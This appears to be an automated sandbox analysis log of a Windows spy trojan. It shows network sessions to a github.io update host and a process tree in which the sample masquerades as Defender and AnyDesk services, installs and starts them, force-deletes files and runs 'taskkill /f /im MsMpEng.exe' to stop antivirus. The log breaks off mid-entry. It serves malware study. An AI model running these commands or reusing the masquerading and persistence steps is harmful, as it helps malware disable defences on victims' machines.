2024-09-29 00:27:26 UTC | 752 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 18
    Server: GitHub.com
    Content-Type: text/plain; charset=utf-8
    permissions-policy: interest-cohort=()
    x-origin-cache: HIT
    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
    Access-Control-Allow-Origin: *
    Strict-Transport-Security: max-age=31556952
    ETag: "66e38c97-12"
    expires: Sun, 29 Sep 2024 00:36:09 GMT
    Cache-Control: max-age=600
    x-proxy-cache: MISS
    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
    Accept-Ranges: bytes
    Date: Sun, 29 Sep 2024 00:27:26 GMT
    Via: 1.1 varnish
    Age: 77
    X-Served-By: cache-ewr-kewr1740038-EWR
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1727569647.603709,VS0,VE4
    Vary: Accept-Encoding
    X-Fastly-Request-ID: 46b5bf0045f4ef5f8a576433915680f49ca66af8
2024-09-29 00:27:26 UTC | 18 | IN | Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
    Data Ascii: version=20240913


Session ID: 18
Source IP: 192.168.2.6
Source Port: 49739
Destination IP: 185.199.110.153
Destination Port: 443
PID: 2128
Process: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe

Timestamp: 2024-09-29 00:27:32 UTC | Bytes transferred: 61 | Direction: OUT
Data:
GET /file/version.txt HTTP/1.1
Host: duy-thanh.github.io

Timestamp: 2024-09-29 00:27:32 UTC | Bytes transferred: 731 | Direction: IN
Data:
HTTP/1.1 200 OK
Connection: close
Content-Length: 18
Server: GitHub.com
Content-Type: text/plain; charset=utf-8
permissions-policy: interest-cohort=()
Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=31556952
ETag: "66e38c97-12"
expires: Sun, 29 Sep 2024 00:36:17 GMT
Cache-Control: max-age=600
x-proxy-cache: MISS
X-GitHub-Request-Id: 9139:1C52C8:26F8EF8:2B104B9:66F89EA8
Accept-Ranges: bytes
Age: 75
Date: Sun, 29 Sep 2024 00:27:32 GMT
Via: 1.1 varnish
X-Served-By: cache-nyc-kteb1890078-NYC
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1727569653.844802,VS0,VE1
Vary: Accept-Encoding
X-Fastly-Request-ID: ee8fa0e5f165a34e006807c5ba96ad657b2dfd5a

Timestamp: 2024-09-29 00:27:32 UTC | Bytes transferred: 18 | Direction: IN
Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
Data Ascii: version=20240913


Session ID: 19
Source IP: 192.168.2.6
Source Port: 49740
Destination IP: 185.199.110.153
Destination Port: 443
PID: 2128
Process: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe

Timestamp: 2024-09-29 00:27:39 UTC | Bytes transferred: 61 | Direction: OUT
Data:
GET /file/version.txt HTTP/1.1
Host: duy-thanh.github.io

Timestamp: 2024-09-29 00:27:39 UTC | Bytes transferred: 752 | Direction: IN
Data:
HTTP/1.1 200 OK
Connection: close
Content-Length: 18
Server: GitHub.com
Content-Type: text/plain; charset=utf-8
permissions-policy: interest-cohort=()
x-origin-cache: HIT
Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=31556952
ETag: "66e38c97-12"
expires: Sun, 29 Sep 2024 00:36:09 GMT
Cache-Control: max-age=600
x-proxy-cache: MISS
X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
Accept-Ranges: bytes
Date: Sun, 29 Sep 2024 00:27:39 GMT
Via: 1.1 varnish
Age: 90
X-Served-By: cache-ewr-kewr1740062-EWR
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1727569659.230596,VS0,VE2
Vary: Accept-Encoding
X-Fastly-Request-ID: e2060851b14f1b6bc8afae8c30e94ec82ef1e814

Timestamp: 2024-09-29 00:27:39 UTC | Bytes transferred: 18 | Direction: IN
Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
Data Ascii: version=20240913


Session ID: 20
Source IP: 192.168.2.6
Source Port: 49741
Destination IP: 185.199.110.153
Destination Port: 443
PID: 2128
Process: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe

Timestamp: 2024-09-29 00:27:45 UTC | Bytes transferred: 61 | Direction: OUT
Data:
GET /file/version.txt HTTP/1.1
Host: duy-thanh.github.io

Timestamp: 2024-09-29 00:27:45 UTC | Bytes transferred: 752 | Direction: IN
Data:
HTTP/1.1 200 OK
Connection: close
Content-Length: 18
Server: GitHub.com
Content-Type: text/plain; charset=utf-8
permissions-policy: interest-cohort=()
x-origin-cache: HIT
Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=31556952
ETag: "66e38c97-12"
expires: Sun, 29 Sep 2024 00:36:09 GMT
Cache-Control: max-age=600
x-proxy-cache: MISS
X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
Accept-Ranges: bytes
Date: Sun, 29 Sep 2024 00:27:45 GMT
Via: 1.1 varnish
Age: 96
X-Served-By: cache-ewr-kewr1740025-EWR
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1727569666.705263,VS0,VE2
Vary: Accept-Encoding
X-Fastly-Request-ID: ae1dfb2d30a008b86c8990514ac8892f8f153163

Timestamp: 2024-09-29 00:27:45 UTC | Bytes transferred: 18 | Direction: IN
Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
Data Ascii: version=20240913


Session ID: 21
Source IP: 192.168.2.6
Source Port: 49742
Destination IP: 185.199.110.153
Destination Port: 443
PID: 2128
Process: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe

Timestamp: 2024-09-29 00:27:52 UTC | Bytes transferred: 61 | Direction: OUT
Data:
GET /file/version.txt HTTP/1.1
Host: duy-thanh.github.io

Timestamp: 2024-09-29 00:27:52 UTC | Bytes transferred: 753 | Direction: IN
Data:
HTTP/1.1 200 OK
Connection: close
Content-Length: 18
Server: GitHub.com
Content-Type: text/plain; charset=utf-8
permissions-policy: interest-cohort=()
x-origin-cache: HIT
Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=31556952
ETag: "66e38c97-12"
expires: Sun, 29 Sep 2024 00:36:09 GMT
Cache-Control: max-age=600
x-proxy-cache: MISS
X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
Accept-Ranges: bytes
Date: Sun, 29 Sep 2024 00:27:52 GMT
Via: 1.1 varnish
Age: 103
X-Served-By: cache-ewr-kewr1740048-EWR
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1727569672.139972,VS0,VE3
Vary: Accept-Encoding
X-Fastly-Request-ID: 6f1d2b9b36ebac204e9d46fe839e123aa8b71a17

Timestamp: 2024-09-29 00:27:52 UTC | Bytes transferred: 18 | Direction: IN
Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
Data Ascii: version=20240913


Session ID: 22
Source IP: 192.168.2.6
Source Port: 49743
Destination IP: 185.199.110.153
Destination Port: 443
PID: 2128
Process: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe

Timestamp: 2024-09-29 00:27:58 UTC | Bytes transferred: 61 | Direction: OUT
Data:
GET /file/version.txt HTTP/1.1
Host: duy-thanh.github.io

Timestamp: 2024-09-29 00:27:58 UTC | Bytes transferred: 753 | Direction: IN
Data:
HTTP/1.1 200 OK
Connection: close
Content-Length: 18
Server: GitHub.com
Content-Type: text/plain; charset=utf-8
permissions-policy: interest-cohort=()
x-origin-cache: HIT
Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=31556952
ETag: "66e38c97-12"
expires: Sun, 29 Sep 2024 00:36:09 GMT
Cache-Control: max-age=600
x-proxy-cache: MISS
X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
Accept-Ranges: bytes
Date: Sun, 29 Sep 2024 00:27:58 GMT
Via: 1.1 varnish
Age: 109
X-Served-By: cache-ewr-kewr1740052-EWR
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1727569678.418008,VS0,VE2
Vary: Accept-Encoding
X-Fastly-Request-ID: 7be212b60ff8cbffa1d58ff9e604c1880f483aa2

Timestamp: 2024-09-29 00:27:58 UTC | Bytes transferred: 18 | Direction: IN
Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
Data Ascii: version=20240913


Session ID: 23
Source IP: 192.168.2.6
Source Port: 49744
Destination IP: 185.199.110.153
Destination Port: 443
PID: 2128
Process: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe

Timestamp: 2024-09-29 00:28:04 UTC | Bytes transferred: 61 | Direction: OUT
Data:
GET /file/version.txt HTTP/1.1
Host: duy-thanh.github.io

Timestamp: 2024-09-29 00:28:04 UTC | Bytes transferred: 753 | Direction: IN
Data:
HTTP/1.1 200 OK
Connection: close
Content-Length: 18
Server: GitHub.com
Content-Type: text/plain; charset=utf-8
permissions-policy: interest-cohort=()
x-origin-cache: HIT
Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=31556952
ETag: "66e38c97-12"
expires: Sun, 29 Sep 2024 00:36:09 GMT
Cache-Control: max-age=600
x-proxy-cache: MISS
X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
Accept-Ranges: bytes
Date: Sun, 29 Sep 2024 00:28:04 GMT
Via: 1.1 varnish
Age: 115
X-Served-By: cache-ewr-kewr1740056-EWR
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1727569685.729017,VS0,VE2
Vary: Accept-Encoding
X-Fastly-Request-ID: 0ef4b84c4a4b714368d9503bbc4d43347da3e8d4

Timestamp: 2024-09-29 00:28:04 UTC | Bytes transferred: 18 | Direction: IN
Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
Data Ascii: version=20240913



Target ID: 0
Start time: 20:25:57
Start date: 28/09/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe"
Imagebase: 0x7ff6c7850000
File size: 161'792 bytes
MD5 hash: 95408095927F78DEFFAEB9CB1F4CD44D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 20:25:57
Start date: 28/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 20:25:57
Start date: 28/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Imagebase: 0x7ff61e120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                    Target ID:5
                                                                                                    Start time:20:26:02
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe" install
                                                                                                    Imagebase:0x7ff76e180000
                                                                                                    File size:143'872 bytes
                                                                                                    MD5 hash:9CEBC167FF7C8AE3CCFFB718FD7B52D0
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 42%, ReversingLabs
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:20:26:02
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:20:26:02
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6636
                                                                                                    Imagebase:0x7ff7aa950000
                                                                                                    File size:60'416 bytes
                                                                                                    MD5 hash:8EB4565C6C7096C17AC94718B2A3724B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 29%, ReversingLabs
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:20:26:02
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2404
                                                                                                    Imagebase:0x7ff7aa950000
                                                                                                    File size:60'416 bytes
                                                                                                    MD5 hash:8EB4565C6C7096C17AC94718B2A3724B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:9
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:10
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:11
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:12
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:13
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:14
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:15
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:16
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:17
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe"
                                                                                                    Imagebase:0x7ff76e180000
                                                                                                    File size:143'872 bytes
                                                                                                    MD5 hash:9CEBC167FF7C8AE3CCFFB718FD7B52D0
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:18
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:19
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:20
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:21
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start MicrosoftWindowsDefenderCoreService
Imagebase:0x7ff684ff0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:20:26:07
Start date:28/09/2024
Path:C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2128
Imagebase:0x7ff7aa950000
File size:60'416 bytes
MD5 hash:8EB4565C6C7096C17AC94718B2A3724B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:23
Start time:20:26:10
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:20:26:10
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:20:26:10
Start date:28/09/2024
Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Imagebase:0x7ff71dd80000
File size:161'792 bytes
MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 32%, ReversingLabs
Has exited:true

Target ID:26
Start time:20:26:10
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start AnyDeskUpdateService
Imagebase:0x7ff684ff0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\oobe\AnyDeskUpdateService.exe"
Imagebase:0x7ff71dd80000
File size:161'792 bytes
MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:33
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6552
Imagebase:0x7ff7aa950000
File size:60'416 bytes
MD5 hash:8EB4565C6C7096C17AC94718B2A3724B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:36
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Imagebase:0x7ff61e120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:20:26:11
Start date:28/09/2024
Path:C:\Windows\System32\taskkill.exe
Wow64 process (32bit):false
Commandline:taskkill /f /im MsMpEng.exe
Imagebase:0x7ff6c7a10000
File size:101'376 bytes
MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:20:26:11
Start date:28/09/2024
